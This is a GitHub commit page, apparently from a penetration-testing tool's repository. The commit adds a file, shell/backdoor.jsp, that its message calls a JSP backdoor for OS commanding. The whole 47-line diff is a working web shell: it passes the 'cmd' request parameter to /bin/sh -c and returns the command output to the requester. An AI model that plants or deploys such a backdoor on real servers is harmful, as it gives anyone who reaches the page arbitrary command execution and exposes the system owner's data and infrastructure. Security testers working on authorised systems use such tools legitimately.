Skip to content

Commit 67e1be0

Browse files
bdamelebdamele
committed
Added a JSP backdoor (GET /.../backdoor.jsp?cmd=<os command>) for long term new features for OS commanding
1 parent 3d81f60 commit 67e1be0

File tree

1 file changed

+47
-0
lines changed

1 file changed

+47
-0
lines changed

shell/backdoor.jsp

Lines changed: 47 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,47 @@
1+
<%@ page import="java.io.*" %>
2+
<%
3+
4+
Process p;
5+
String s, cmd, html;
6+
7+
cmd = request.getParameter("cmd");
8+
if (cmd == null) {
9+
cmd = "pwd";
10+
}
11+
12+
String []bashcmd = {"/bin/sh","-c",cmd};
13+
14+
html = request.getParameter("html");
15+
16+
if (html != null) {
17+
out.println("<HTML>");
18+
}
19+
20+
p = Runtime.getRuntime().exec(bashcmd);
21+
22+
BufferedReader stdInput = new BufferedReader(new
23+
InputStreamReader(p.getInputStream()));
24+
25+
BufferedReader stdError = new BufferedReader(new
26+
InputStreamReader(p.getErrorStream()));
27+
28+
29+
30+
while ((s = stdInput.readLine()) != null) {
31+
out.println(s);
32+
if (html != null) {
33+
out.println("<br>");
34+
}
35+
}
36+
37+
38+
while ((s = stdError.readLine()) != null) {
39+
System.out.println(s);
40+
if (html != null) {
41+
out.println("<br>");
42+
}
43+
44+
}
45+
46+
47+
%>

0 commit comments

Comments
 (0)